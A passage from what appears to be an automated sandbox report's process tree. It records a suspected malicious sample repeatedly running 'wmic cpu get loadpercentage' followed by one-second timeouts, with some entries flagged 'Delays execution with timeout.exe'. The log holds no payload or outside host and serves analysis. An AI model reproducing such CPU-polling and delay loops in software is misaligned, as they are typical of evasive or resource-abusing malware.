  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1724
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3160
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3508
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3348
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3724
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1248
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2340
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1564
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:8
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3508
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:32
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3296
- - C:\Windows\System32\Wbem\WMIC.exe
